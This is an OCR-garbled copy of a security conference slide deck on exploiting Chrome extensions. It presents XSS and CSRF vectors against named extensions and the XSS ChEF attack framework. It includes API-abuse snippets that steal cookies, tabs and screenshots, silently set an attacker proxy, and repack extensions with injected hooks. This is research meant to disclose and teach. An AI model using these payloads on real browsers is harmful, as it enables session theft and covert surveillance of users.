Advanced Chrome Extension Exploita5on Leveraging API Powers for the Be=er Evil. Kyle Kos Osborn Krzysztof Kotowicz

Size: px

Start display at page:

Download "Advanced Chrome Extension Exploita5on Leveraging API Powers for the Be=er Evil. Kyle Kos Osborn Krzysztof Kotowicz"

Martin Skinner
5 years ago
Views:

1 Advanced Chrome Extension Exploita5on Leveraging API Powers for the Be=er Evil Kyle Kos Osborn Krzysztof Kotowicz 1

2 Please complete the Speaker Feedback Surveys. This will help speakers to improve and for Black Hat to make be>er decisions regarding content and presenters for future events. The newest version of this slidedeck and white paper is available at h=p://kyleosborn.com/bh2012

3 Introduc)on Krzysztof Kotowicz IT security consultant at SecuRing h=p://blog.kotowicz.net Kyle Osborn Informa5on Security Specialist at AppSec Consul5ng h=p://kyleosborn.com/ 3

4 Previous research Kyle Osborn, Ma/ Johansen Hacking Google ChromeOS (BH 2011) N. Carlini, A. Porter Felt, D. Wagner - UC Berkeley An EvaluaNon of the Google Chrome Extension Security Architecture h/p:// extensionvulnerabilines.pdf Krzysztof Kotowicz h/p://blog.kotowicz.net/2012/02/intro- to- chrome- addons- hacking.html 4

5 Plan Briefing Chrome extensions security 101 Abusing Chrome extensions Easy exploita5on Using XSS ChEF Workshops all of the above in prac5ce & more 5

6 CHROME EXTENSIONS SECURITY 6

7 Chrome extensions security Extensions are HTML5 applicanons packaged in signed.crx files chrome- extension://<id> URLs Have access to powerful API chrome.tabs chrome.history chrome.cookies chrome.proxy Permissions defined in manifest.json 7

8 Chrome extensions security Content script Can interact with page DOM isolated worlds for page JS / content script JS No access to chrome.* API 8

9 Chrome extensions security Background page Has access to chrome.* API Content scripts and background pages can only exchange messages 9

10 Chrome extensions security Currently, Chrome extension security is very reliant on the developer Wri5ng bad code is easy Giving extensions more permissions than necessary is easier Extensions suffer from common web vulnerabili)es 10

11 Chrome extensions security XSS: page DOM has a vector that is grabbed and executed by extension <link rel="alternate" type="application/rss+xml" title="hello <img src=x onerror='alert(1)'>" href="/rss.rss"> CSRF: Page directly requests extension URLs <iframe src="chrome- extension://<id>/pages/ subscribe.html?location=//evil/whitelist"></iframe> 11

12 Chrome extensions security Most commonly vulnerable RSS readers Note extensions Web Developer extensions 12

13 Chrome extensions security manifest.json Defines resources, permissions, name etc. v1 v2 insecure, but everyone uses it Secure Content- Security- Policy by default (no XSS!) Pages cannot access extension URLs (no CSRF!) Unpopular 26 out of top 1000 extensions Will be enforced in Q

14 Chrome extensions security InstallaIon Methods Chrome Web Store curated by Google.crx install from any website (prompts user) Chrome 21 makes off- store installs harder Drag & drop.crx to chrome://extensions Or use --enable-easy-off-store-extension-install flag MiTM not possible due to cer5ficate signing 14

15 ABUSING CHROME EXTENSIONS 15

16 Fingerprin)ng The simplest method Generate a list of known extension IDs, and bruteforce chrome- extension://id/ resources to discovered extensions use onerror/onload to check for existence hrp://blog.kotowicz.net/2012/02/intro- to- chrome- addons- hacking.html 16

17 CSRF - example Chrome Adblock Extension UI uses pages/subscribe.html pages/subscribe.html?loca5on=url will subscribe to new block list var queryparts = parseuri.parsesearch(document.location.search); //... Subscribe to a list BGcall("subscribe", {id: 'url:' + queryparts.location}); Can be called by any webpage <iframe src="chrome-extension://<id>/pages/ subscribe.html?location=//evil/whitelist"> 17

18 XSS - example Slick RSS + Slick RSS: Feed Finder simple injec5on loca5on (<link> tag 5tle) <link rel="alternate" type="application/rss+xml" title="hello <img src=x onerror='payload'>" href="/rss.rss"> 18

19 XSS - example 19

20 Leveraging XSS Vector in page => XSS in content script No access to chrome.* API Only chrome.extension.* But: e.g. chrome.extension.connect & chrome.extension.sendmessage to communicate chrome.extension.getbackgroundpage().eval( mwahahahahaaaaa! ) 20

21 EASY EXPLOITATION 21

22 Easy exploita)on alert(1) - Now what? Use an automated tool to pillage and plunder BeEF does a great job hooking into DOMs But Need a special tool designed to take advantage of Chrome extension APIs 22

23 Easy exploita)on Enter XSS ChEF (Chrome Extension ExploitaNon Framework) Designed from the ground up for exploi5ng extensions Fast (uses WebSockets) Preloaded with automated a=ack scripts 23

24 Easy exploita)on Monitor open tabs of vicdms Execute JS on every tab Extract HTML Read/write cookies Access localstorage Manipulate browser history Take screenshots of tabs Inject BeEF hooks / keyloggers 24

25 USING XSS CHEF 25

26 XSS ChEF Launching server $ php -v PHP (cli) (built: Jun :49:42) Copyright (c) The PHP Group Zend Engine v2.3.0, Copyright (c) Zend Technologies with Xdebug v2.2.0, Copyright (c) , by Derick Rethans $ php server.php 2>command.log XSS ChEF server by Krzysztof Kotowicz - kkotowicz at gmail dot com Usage: php server.php [port=8080] [host= ] Communication is logged to stderr, use php server.php [port] 2>log.txt :40:06 [info] Server created :40:06 ChEF server is listening on : :40:06 [info] [client :60431] Connected :40:06 [info] [client :60431] Performing handshake :40:06 [info] [client :60431] Handshake sent :40:06 New hook c from

27 XSS ChEF Console 27

28 XSS ChEF Hook code 28

29 XSS ChEF 29

30 XSS ChEF 30

31 XSS ChEF 31

32 API abuse chrome.tabs.query - gets access to all tabs URLs (even incognito!), dtles, documents etc. chrome.tabs.query({}, function(t) { log({type: 'report_tabs','result':t}); }); 32

33 API abuse chrome.tabs.executescript - global XSS on any tab chrome.tabs.executescript(null, { code:"alert(document.cookie)" }); 33

34 API abuse chrome.tabs.capturevisibletab chrome.tabs.capturevisibletab(null,null, function(data_url) { log({type:'recvscreenshot', url: data_url}); }); 34

35 API abuse chrome.cookies read/write cookies, even h=ponly chrome.cookies.getall({url: " cb); {"domain": ".google.com", "expirationdate": , "hostonly": false, "httponly": true, "name": "NID", "path": "/", "secure": false, "session": false, "storeid": "0", "value": "61=..." },... chrome.cookies.set({ url: ' name: 'test-chef', value: 'test-ok', secure: true, httponly: true, expirationdate: null, path: '/' }, cb); 35

36 API abuse chrome.proxy - silently change HTTP proxy! var evilproxy = { "mode": "fixed_servers", "rules": { "bypasslist": ["<local>","attacker_domain.com"], // EXCLUDE BACK CHANNEL FROM PROXY "singleproxy": { "host": "localhost", // ATTACKER PROXY IP "port": 8080, // ATTACKER PROXY PORT "scheme": "http" // ATTACKER PROXY SCHEME } } } chrome.proxy.settings.set({value: evilproxy, scope: 'regular'}, cb); 36

37 API abuse chrome.bookmarks - interact with bookmarks chrome.bookmarks.search("http", cb); {"dateadded": , "id": "123", "index": 0, "parentid": "21", "title": "GMail", "url": " 37

38 Pre- Workshop Info Requirements Latest version of XSS ChEF required (w/ dependencies) PHP 5.x + HTTP server, op5onally node.js unzip, curl Only heavily tested under OS X & Linux Chrome Selected extensions All links can be found on h=p://kos.io/bh

39 BREAK (THEN WORKSHOP) h/p://kos.io/bh

40 Workshop Part one: Exploitadon Discovery Automa5on Part two: Repacking Leveraging the human factor 40

41 Part one: Exploita)on Web Developer 41

42 Part one: Exploita)on Springpad Extension 42

43 Part one: Exploita)on Cookie Manager 43

44 Part one: Exploita)on Slick RSS Slick RSS: Feed Finder 44

45 Part one: Exploita)on Speed Dial 45

46 Part Two: Repacking Wanted to get MORE privileges Udlizes click- through- syndrome 46

47 Part Two: Repacking repacker-webstore.sh <ID> output.crx Unpacking... Injecting xsschef... Adding permissions... Saving... Done. Moving signed extension to output.crx 47

48 Please complete the Speaker Feedback Surveys. This will help speakers to improve and for Black Hat to make be>er decisions regarding content and presenters for future events. The newest version of this slidedeck and white paper is available at h=p://kyleosborn.com/bh2012

AN EVALUATION OF THE GOOGLE CHROME EXTENSION SECURITY ARCHITECTURE

AN EVALUATION OF THE GOOGLE CHROME EXTENSION SECURITY ARCHITECTURE Nicholas Carlini, Adrienne Porter Felt, David Wagner University of California, Berkeley CHROME EXTENSIONS CHROME EXTENSIONS servers servers